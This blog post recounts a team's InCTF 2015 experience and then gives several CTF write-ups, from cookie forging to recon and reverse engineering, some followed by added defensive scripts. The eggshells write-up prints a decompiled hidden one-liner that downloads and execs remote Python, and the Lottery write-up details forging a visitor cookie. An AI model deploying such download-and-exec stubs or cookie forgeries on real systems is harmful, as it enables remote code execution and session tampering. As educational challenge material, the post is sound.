InCTF-2015 Experiences

Hello every one 😀

In this post I will be sharing my experiences of InCTF2015. I am writing this blog as the admins of the CTF have made it a question worth 100 points, and the difference between us and the team below us was just a matter of solving the question first (bonus score). Anyway I don’t think that there will be any bonus score for this question, as I am not the first one to send my experiences, and I hope the VYkingS team didn’t send their experience first 😛

And also I wish that the awarding of points will not be done as in the college exams (based on the length of the answer written lol :P). One more thing: these are not just my personal experiences, they represent the team’s (beginners’) experiences (another way of saying other members of the team may or may not write their own :D, best way to skip the job)

Enough of this intro. To be frank, InCTF is the only challenge which made me feel confident that I can achieve something great 😀 Words are not sufficient for me to describe this CTF, and I am not a writer either 😛 (doesn’t mean that this is the end of the post)

I have taken part in some CTFs like PicoCTF, but I had never participated in a live CTF, been able to solve this many challenges, had a real feel of the CTF and the competition, thought of winning it and really won it 😀

So I will say how this CTF went. First of all, the day before the challenge I was given the task of submitting the first round tasks by sending them an email. I had a holiday on Friday as there were some cultural events, so I slept a lot on Friday, and in the night I started looking at the first round questions and trying to complete them if there were any blanks and some missing things etc. So I submitted them around 5 AM (as usual, do the assignment on the last day in engineering :P). My team mate told me that he would wake me up at 9 AM, and we thought to get ready by 10 AM and start the competition. Thank God that on Friday something big happened in Kerala and Saturday was declared a hartal (bandh – in Kerala you can expect them once a week, so lots of holidays for our college 😛 )

My friend Rakesh (rok_ in IRC) woke me up only at 10 AM so that I could sleep more 😀 and then I came to know that the CTF would be starting only at 12. I felt very happy, as I need not start the CTF late (as in the case of a normal class, and then ask faculty for attendance; attendance is very strict in Amrita :P). This definitely helped us, as otherwise we couldn’t have scored the bonus points which made us lead the CTF. So I watched India batting for some time, and the wickets fell continuously, so I stopped watching (you know these lucky things right :D). And then I started going to the lab, knowing everything regarding the hartal was fine now (as the wifi at the hostel sucks, as slow as 50 kbps, which is far less than the 3G speed on my mobile)

Sai Ram (blah_blah) was already there in the lab waiting for the challenges to come online (he is our crypto expert). After that we had our food in the mess (mess food really sucks here 🙁 ) and then our other members Rakesh and Abhishek (REVO in IRC) joined us.

So in this manner the CTF started, and the first thing that we targeted was trivia, as it’s the best way to score points easily. So we got hefty points (including bonus points) in the beginning and we solved all the trivia (including the twitter picture, the top image in the blog) except 2 questions, the IP one and the docx one.

I tried localhost for the IP one, as I know nothing more than that since I haven’t taken my network classes yet. Later I asked the admin about the same; he told me I was correct but there was some similar name for localhost, and all I found was loopback, so I gave it a try and got the flag

We were stuck at the docx one till the next day. It was my mistake 🙁 After extracting the tar.gz file I got a zip file; instead of a second thought I just unzipped the file 🙁 This was my damn mistake, and I was trying to get the answer by zipping the file again and renaming the file to docx, and this didn’t work because the version of zip on my machine was the latest one 🙁 When the admins told us that they had made the question easy for us, I got the flag in a matter of just typing 😀 Lesson learned: if you are not getting a simple challenge, try to start doing it again, you might have done something wrong

My area is RE, so I first went about those problems. The first two sums were pretty easy and I got them as soon as I opened them in IDA Pro. The first one was a small ARM question and in the second one hardcoded password strings gave the flag

And the third one was a jar file. I have jad (java decompiler, no need for an online one :D) and decompiled it, but I have never coded in Java, and all the problems I had done in PicoCTF were just hardcoded, i.e. the password was right there when I just decompiled them. So I postponed this one to the next day (I should have done it right then, as it was also a very easy one)

I started doing the forensics even though it was not my piece of cake. The first one which I solved was the fixme one; in this question we were given an image file and it was damaged. As per my knowledge the thing that they would have done is just changed the header of the image, but I have never used any tools or a hex editor to change it to match the exact header; the online services saved me from a lot of googling and installing new software 😛 and got the image fixed. Not sure which one worked for me, but I will mention them in the write-up if I have time

The second one was a pcap file, and my friends found something interesting in Wireshark which said it’s the key (but it didn’t say that it is the flag :P). We submitted the same key many times and even told the admins that the question had some issue with it; later we came to know that we needed to get a file from the pcap and this was the key to open the file. I used a lot of tools in a Windows VM to get the files from the pcap but nothing worked well (or my VM is bad), but I found an awesome tool for Linux named foremost which gave me the zipped file in a matter of seconds, and I used the key to unzip the flag and then got the flag 😀

I tried many other sums, but not sure if I can explain them here. A few of the web questions were solved by Abhishek (REVO); one was the 9999 sum where we needed to give the hex value, not sure about the second one

Rakesh (rok) was able to solve a few binaries, not sure how he got them

By the night around 12 we got a score of 1500 and we were almost in the top 5 (not sure about it, it might be top 10 too), so we did our best for the first day

So Rakesh and I decided to take a good rest so that we would be able to solve the rest well tomorrow, and Sai Ram and Abhishek decided to burn the midnight oil 😀

On the way back in the night we had a great opportunity to steal mangoes from one house on our way to the hostel (every day there used to be a dog, and it was our lucky day that it wasn’t there or was sleeping). We ate the first mango of this season even before Ugadi (Ugadi is a festival of Andhra people)

And the best part was that the hostel door was locked and the only way we could enter was by jumping the wall (which is common for us, don’t tell our warden)

The next day I was in the lab by 9 AM (everyone was surprised, as I never get up that early on Sundays and come to the lab)

This day was not that successful in points (but we were slowly moving closer to our answers). Our position went as low as 20, but we were still first in our campus (so we would be sure of the 3rd round)

But something worse happened to us: we were overtaken by a girls’ (seniors) team from our campus who were participating in the CTF for the first time (no offence Anonymous, I suggest you choose another team name, as this name doesn’t have a good reputation in the security field)

But the lesson learned was never give up even though everything seems very difficult (as you can see from our results, as we topped)

But when the hints were given we were able to slowly gain score towards the end, and the mass hints were very useful to us 😀

We will be trying to write writeups, explaining them very clearly, and updating this post too

Anyway we were able to solve all the RE and crypto (credit goes to Sai Ram, our crypto master; in RE all except those which were taken down)

Screenshot from 2015-03-15 23:33:05

Here is the screenshot of the questions solved. In the last minute our target was just to make sure that our team would be first; the new opponent that we had was the IITR VKingS team, which came equal to us (except for the bonus points). All our team members were working in the last minute to make sure that we scored one more question and remained in our position. Sai Ram and I were working on forensics, Rakesh on a binary and Abhishek on the Poodle question (if we had been able to continue solving the same, we would have been nowhere reachable by the other team)

Anyway the final score was like this

Screenshot from 2015-03-16 00:00:53

Now coming to the final words (I have been told by the admins that the points for this question will be awarded based on how well we appreciate the team and their work 😛 jk)

Overall the CTF was excellent 😀

We appreciate all the people who are responsible for creating this great event

The greatest thing about this event is that it was not at all run for profit, and the motto of InCTF was to make more people from our country interested in cyber security; the event organizers didn’t expect anything in return other than our active participation (though they get some experience in conducting CTFs :P)

Also definitely the InCTF2015 sponsor VMware, as they are the main people sponsoring this event by bearing all the money for the servers and travel charges for the 3rd round etc … Think of the case if they weren’t there and each team had to pay 200 INR in the form of a DD to Amrita University; the case would have been different

Fedora for making more girls’ teams participate

Mycodeschool for publicity (even though some teams complain that publicity was not so good, hope they understand that the resources (money) are very limited)

Not least the Amrita University Cyber Security Department (believe me, I won’t get any extra credits for this 😛 )

Cons :- (Indians can complain about everything even though everything was perfectly good 😛 )

Rules were not clear, for example the 3 points bonus score; I think it’s nowhere mentioned on the website, even though we figured it out very fast

Also I wish every question were named as in PicoCTF, based on the question type, not just bin1, bin2 and so on, but the clues made it clear; forensics question names were based on the type though

The website is too old 😛 I think it can go for a new design

That’s it 😀

Tummala Dhanvi (c0mrad3, black shirt at the back in the main photo)

Sai Ram (blah_blah, white checks at the back)

Abhishek (REVO, man with specs and red shirt, selfie taker :P)

Rakesh (rok_, the remaining one 😛 )

LOTTERY ASIS-CTF-2014 Web-100 writeup

Screenshot from 2014-10-23 18:28:07

This question is the basics of a web challenge. If we go to the link given above we get a message like this when we visit the page for the first time 🙂

Screenshot from 2014-10-23 21:06:49

As the page says let’s visit the page for the second time 🙂

Screenshot from 2014-10-23 21:11:10

So here comes the lottery, which says that we are the 2444th visitor and we need to become the 1234567890th visitor to win the lottery, along with the clue saying don’t hack cookies. We should always be doing the thing that we are not supposed to do, so let’s try hacking the cookies. But the first thing we need to do when we see a web question is to view the source of the given page 🙂 When you see the source you will understand that there is no other way to find the visitor number except the cookie 🙂

If you are not aware what a cookie is, find out about it at http://en.wikipedia.org/wiki/HTTP_cookie

I have a cool tool called “EditThisCookie” to edit the cookies; you can get it in the Chrome store at https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en

If you look at the cookie named Visitor you will see a value like this, which is URL encoded

MjQ1Njo3Y2Y2NDM3OWViNmYyOWE0ZDI1YzRiNmEyZGY3MTNlNA%3D%3D

For more details about it visit the wiki page on URL encoding http://en.wikipedia.org/wiki/Percent-encoding

If you have any doubt about why URL encoding is used, this link will give you the answer http://stackoverflow.com/questions/4667942/why-should-i-use-urlencode

Decode it using any tool; I use this online tool http://www.url-encode-decode.com/

The decoded result will be like this

MjQ1Njo3Y2Y2NDM3OWViNmYyOWE0ZDI1YzRiNmEyZGY3MTNlNA==

which again seems to be base64 encoding; if you decode it, the output looks like this

2456:7cf64379eb6f29a4d25c4b6a2df713e4

2456 seems to be our visitor number, so if we could change the number to 1234567890 we could win the lottery (get the flag 😀 )
The number after the 2456 is nothing but the md5sum of the number 2456 🙂

So

1234567890:e807f1fcf82d132f9bb018ca6738a19f

is the value we need to put in the cookie. In base64 it becomes

MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg==

and finally we need to URL encode it, which looks like

MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg%3D%3D

So if you set the cookie to this value and refresh the page, you get the flag as

ASIS_9f1af649f25108144fc38a01f8767c0c

Here is the screenshot of the flag 🙂

Screenshot from 2014-10-24 19:13:47
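As an added example (my own code, not part of the original write-up or the challenge), the following script reproduces the cookie layering described above in Python: percent-encoding over base64 over `number:md5(number)`. It decodes the cookie value from the write-up, rebuilds one for an arbitrary visitor number, and then shows the hardened variant the challenge lacked: an HMAC tag computed with a server-side secret, so a client cannot recompute the “signature” from a public value. The secret key in the block is a constructed placeholder.

```python
import base64
import hashlib
import hmac
from urllib.parse import quote, unquote

# Cookie layout from the write-up:
#   percent-encode( base64( "<visitor number>:<md5 hex of that number>" ) )


def decode_visitor_cookie(cookie):
    """Strip the two encoding layers and split the 'number:md5' payload."""
    raw = base64.b64decode(unquote(cookie)).decode("ascii")
    number, digest = raw.split(":", 1)
    return int(number), digest


def encode_visitor_cookie(number):
    """Rebuild a cookie for any visitor number.

    The 'signature' is only md5 of a value the client already knows, so anyone
    can recompute it. That is the whole weakness of this scheme.
    """
    digest = hashlib.md5(str(number).encode("ascii")).hexdigest()
    raw = f"{number}:{digest}".encode("ascii")
    # safe="" so that '/', '+' and '=' in the base64 text are all percent-encoded
    return quote(base64.b64encode(raw).decode("ascii"), safe="")


def is_self_consistent(cookie):
    """The only check the challenge can do: does the md5 match the number?"""
    number, digest = decode_visitor_cookie(cookie)
    expected = hashlib.md5(str(number).encode("ascii")).hexdigest()
    return hmac.compare_digest(digest, expected)


# Hardened variant (my addition, not the challenge's code): HMAC-SHA256 with a
# server-side key. The client cannot produce a valid tag without the key.
def make_signed_cookie(number, key):
    body = str(number).encode("ascii")
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode("ascii")
    return quote(base64.b64encode(body + b":" + tag).decode("ascii"), safe="")


def verify_signed_cookie(cookie, key):
    """Return the visitor number, or None if the cookie is malformed or forged."""
    try:
        raw = base64.b64decode(unquote(cookie))
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    body, sep, tag = raw.partition(b":")
    if not sep:
        return None
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode("ascii")
    if not hmac.compare_digest(tag, expected):
        return None
    return int(body)


# Cookie value quoted in the write-up.
ORIGINAL_COOKIE = "MjQ1Njo3Y2Y2NDM3OWViNmYyOWE0ZDI1YzRiNmEyZGY3MTNlNA%3D%3D"

if __name__ == "__main__":
    print(decode_visitor_cookie(ORIGINAL_COOKIE))
    forged = encode_visitor_cookie(1234567890)
    print(forged, is_self_consistent(forged))
    key = b"constructed-demo-secret"  # constructed; a real server loads this from config
    print(verify_signed_cookie(make_signed_cookie(2456, key), key))
    print(verify_signed_cookie(forged, key))  # the md5-style cookie no longer verifies
```

`verify_signed_cookie` returns `None` for the md5-style cookie as well as for a cookie signed under a different key, which is the behaviour a visitor counter (or any session value) should have if the server wants to trust it.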

HOW MUCH EXACTLY? ASIS-2014 Trivia-25 writeup

Screenshot from 2014-10-23 18:27:19

This is a very easy question, as Google was enough to get the key 🙂

If you google the description you will get the following link https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt

If you search (Ctrl+F ————-> find) in that page for “how much”, you will see that all the references are taken from this link http://www.sims.berkelev.edu/research/proiects/how-much-%20info-2003/execsum.htm#summary

Unfortunately this web page is not available now; if you google for it you will get a link on www2 as http://www2.sims.berkeley.edu/research/projects/how-much-info-2003/execsum.htm

If you search for IM (Instant messaging) you get that its size is 274 Terabytes

Screenshot from 2014-10-23 18:47:42

The format of the flag is ASIS_md5(size), which means that we need to find the md5sum of the size and prefix it with “ASIS_”, which results in the flag below. We can find the md5sum of any value in the terminal using the following command

echo -n 274 | md5sum

The -n flag tells echo not to output a trailing newline; by default echo appends a newline, and a newline at the end of 274 changes the md5sum, so we should not forget it 🙂

ASIS_d947bf06a885db0d477d707121934ff8

But later I found that the size of instant messaging was directly in the link https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt

I should have searched for instant messaging in the text file directly, which I later learned from another write-up

Screenshot from 2014-10-23 18:48:21

T_1000 ECTF Recon-120 writeup

Screenshot from 2014-10-23 16:23:30

This is the toughest recon that I have ever seen (or in other words, the worst one :P)

The first result that you find when you search for T_1000 is the Terminator, so I tried all the names related to the movie, such as the director, the producer, the actor who played the T_1000, but no result 🙁 I also tried Skynet, which is considered to have made the Terminator in the film 😛 My team mate was kidding, saying to enter the flag as Rajinikanth 😀

After asking the admins about the challenge, I concluded that T_1000 was not related to movies 🙂

My team mate solved the forensics-500, which relates to the channel #nitk-maliciousbots containing a bot named T_1000, so I thought this was the end of the recon and tried to get the flag by asking the bot in a private message, but this was only half of the challenge 🙂

Again from the clue, whois T_1000; the output of the whois command in IRC is as follows

@31337_h4X0R (cinch@2a01:7e00::f03c:91ff:fe56:df09)

BOT_T_1000 is connected via holmes.freenode.net (London, UK)

Operator in:

#nitk-maliciousbots

So we got a new thing to google for 🙂 i.e. 31337_h4X0R; it seems that 31337_h4X0R has a twitter account, here is the account https://twitter.com/31337_h4X0R

This account has very few tweets and it contains this photo

shellshock

And finally, if you run strings on the photo and grep the output, you get the flag as follows

Screenshot from 2014-10-23 18:14:40

flag{I_am_N0t_Ge0Hot}

Eight Cats Hid The Flag ECTF 2014 Recon 100 writeup

Screenshot from 2014-10-23 16:23:48

From the question and the clue given we can surely say that the flag is in one of the admins’ GitHub repositories.

First I got the idea of downloading all the files and grepping them for the flag (this method did not work because the flag had been deleted, so you can’t find the flag in the current files of any of the repositories)

I tried manually checking all the commits of the admins but I didn’t succeed, because the commit was very old, like a month old, and I didn’t go that deep into the commits 🙁

Here is the link of the commit in which the flag was deleted https://github.com/karthiksenthil/Learn-Git/commit/9cd4ecad6f7c545ef5ac31622d503de811191d7b

flag{0ctocat_c4n_play_h1de_and_s33k}
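The lesson of this challenge is that deleting a file in a later commit does not remove it from the repository: the content stays reachable through history. As an added example (my own code, not part of the original write-up or the admins’ repository), the script below builds a small throwaway repository in which one commit adds a constructed flag and the next commit deletes it, then contrasts “download and grep the working tree” (finds nothing) with walking the full history using git’s pickaxe option (`git log -S`), which is the same approach a secret-scanning tool takes. It assumes the `git` binary is on PATH; the repository contents and the flag value are constructed for the demo.

```python
import os
import re
import subprocess
import tempfile

FLAG_RE = re.compile(r"flag\{[^}]*\}")


def run_git(repo, *args):
    """Run git inside `repo` with an isolated HOME so global config cannot interfere (assumes git on PATH)."""
    env = dict(os.environ, HOME=repo, GIT_CONFIG_NOSYSTEM="1", GIT_PAGER="cat")
    result = subprocess.run(["git", "-C", repo, *args], check=True,
                            capture_output=True, text=True, env=env)
    return result.stdout


def build_demo_repo():
    """Constructed repository: commit 1 leaks a flag, commit 2 deletes it again."""
    repo = tempfile.mkdtemp(prefix="hideandseek-")
    run_git(repo, "init", "-q")
    run_git(repo, "config", "user.email", "demo@example.invalid")
    run_git(repo, "config", "user.name", "demo")
    path = os.path.join(repo, "notes.txt")
    with open(path, "w") as f:
        f.write("shopping list\nflag{constructed_demo_flag}\n")
    run_git(repo, "add", "notes.txt")
    run_git(repo, "commit", "-q", "-m", "add notes")
    with open(path, "w") as f:
        f.write("shopping list\n")  # the flag line is gone from the working tree
    run_git(repo, "add", "notes.txt")
    run_git(repo, "commit", "-q", "-m", "remove the flag")
    return repo


def grep_working_tree(repo):
    """What 'download everything and grep' sees: only the files as they are now."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(repo):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in filenames:
            with open(os.path.join(dirpath, name), errors="replace") as f:
                hits.extend(FLAG_RE.findall(f.read()))
    return hits


def find_deleted_flags(repo):
    """Walk every commit on every branch and collect flag-like strings on removed lines.

    -S<text> (the pickaxe) limits the log to commits that change the number of
    occurrences of <text>, so the deleting commit is found even if it is months old.
    """
    log = run_git(repo, "log", "--all", "-p", "-Sflag{", "--format=commit %H")
    commit, hits = None, []
    for line in log.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("-") and not line.startswith("---"):
            # a '-' line in the patch is content that the commit removed
            hits.extend((commit, m) for m in FLAG_RE.findall(line[1:]))
    return hits


if __name__ == "__main__":
    demo = build_demo_repo()
    print("working tree:", grep_working_tree(demo))
    print("history:", find_deleted_flags(demo))
```

The working-tree grep comes back empty while the history walk returns the deleting commit and the flag it removed. For a defender the same script, pointed at a real repository, is a quick check that a credential “removed” by a later commit has not actually left the repository; removing it for real requires rewriting history and rotating the secret.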

Meet The Team – Ectf 2014 Recon-80

Screenshot from 2014-10-23 16:17:29

I have attached the screenshot of the question 🙂 of Recon-80

The question is very simple, but getting the blog of the team becomes hard because ECTF is organised for the first time.

The ECTF organizers don’t have a well-established blog containing all the write-ups of the challenges they have solved; it seems they created the blog just for the purpose of this challenge, as it contains only one post, which makes it difficult for search engines to surface that link (if any of you googled for the blog and did not get the link, don’t blame Google, as it is doing a great job)

The name of the team which is organising the CTF is NIA (no internet access). They mentioned it in the clue also, but you would never get to know that it is the name of the team; for more details visit this link http://nia-ctf.github.io/

Bingo, you get the blog link on ctftime.org at this address https://ctftime.org/team/8096, and the link is http://nia-ctf.github.io/, so you have the flag. There was some small confusion regarding the format of the flag, but the admin would have helped you at that time 🙂

flag:http://nia-ctf.github.io/

CSAW CTF Quals 2014 – eggshells (100) writeup

Here is the link to the zip file and the question http://shell-storm.org/repo/CTF/CSAW-2014/Reverse_Engineering/eggshells-100/

The question is :

I trust people on the internet all the time, do you?

Written by ColdHeat

The question doesn’t give you any kind of hint when you first try to solve it, but when you finally see the result it makes sense to you 🙂

First, when you unzip the file you get two directories named “eggshells-master” and “__MACOSX”; here are the screenshots of the contents of both folders.

Screenshot from 2014-10-07 19:09:00

Screenshot from 2014-10-07 20:50:32

The source code of all the other files is readable, except the utilys.pyc file, which is a compiled Python file. You can decompile it using this application (https://sourceforge.net/projects/easypythondecompiler/ ), which is based on uncompyle2 (https://github.com/Mysterie/uncompyle2), or whatever else can decompile Python 2.7 files 🙂

If you decompile the file here is the code that you get:

[code language="python"]
exec __import__('urllib2').urlopen('http://kchung.co/lol.py').read()
[/code]

Don’t be in a hurry to just run the code, as it is a fork bomb 🙂

Screenshot from 2014-10-07 21:50:31

Here you get the flag : flag{trust_is_risky}

Now you get why the question is like that 🙂
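The one-liner recovered from utilys.pyc is the classic shape of a “download and execute” stub: dynamic execution (`exec`) of whatever a remote URL returns. As an added example (my own code, not from the challenge or the write-up), the scanner below flags that pattern in decompiled or hand-written Python source before anyone runs it. It works on lines of text rather than an AST so that Python 2 statements such as `exec expr` are handled as well as Python 3 `exec(...)`. The sample stubs and the URL in them are constructed placeholders; the categories and regexes are my own choices, not a published ruleset.

```python
import re

# Indicators typical of a download-and-run stub. Each name maps to a regex
# applied per line of source; the combination matters more than any single hit.
INDICATORS = {
    "dynamic_exec": re.compile(r"\b(exec|eval)\b"),
    "dynamic_import": re.compile(r"__import__\s*\("),
    "network_fetch": re.compile(r"\b(urlopen|urlretrieve|requests\.(get|post))\b"),
    "remote_url": re.compile(r"https?://[^\s'\"()]+"),
    "decoding": re.compile(r"\b(b64decode|decodestring|decompress|fromhex)\b"),
}


def scan_source(source):
    """Return [(line number, [indicator names])] for every line that matches something."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        names = [name for name, rx in INDICATORS.items() if rx.search(line)]
        if names:
            findings.append((lineno, names))
    return findings


def extract_urls(source):
    """URLs the code would contact; worth blocking or sandboxing before any run."""
    return INDICATORS["remote_url"].findall(source)


def is_remote_exec_stub(source):
    """True when code is executed dynamically AND something is fetched over the network.

    Either indicator alone is common in benign code; together they describe
    exactly what the eggshells stub does.
    """
    seen = {name for _, names in scan_source(source) for name in names}
    return "dynamic_exec" in seen and bool(seen & {"network_fetch", "remote_url"})


# Constructed samples (placeholder host, not the challenge's URL).
STUB_PY2 = "exec __import__('urllib2').urlopen('http://example.invalid/lol.py').read()\n"
STUB_PY3 = (
    "import urllib.request\n"
    "code = urllib.request.urlopen('http://example.invalid/lol.py').read()\n"
    "exec(code)\n"
)
BENIGN = "def add(a, b):\n    return a + b\n"

if __name__ == "__main__":
    for label, src in (("py2 stub", STUB_PY2), ("py3 stub", STUB_PY3), ("benign", BENIGN)):
        print(label, is_remote_exec_stub(src), scan_source(src), extract_urls(src))
```

Run over the decompiled utilys.pyc text, the scanner reports the line as dynamic execution plus a network fetch with an external URL, which is reason enough to read the code in a sandbox rather than run it; the fork bomb the write-up warns about is only the payload that happened to sit behind the URL.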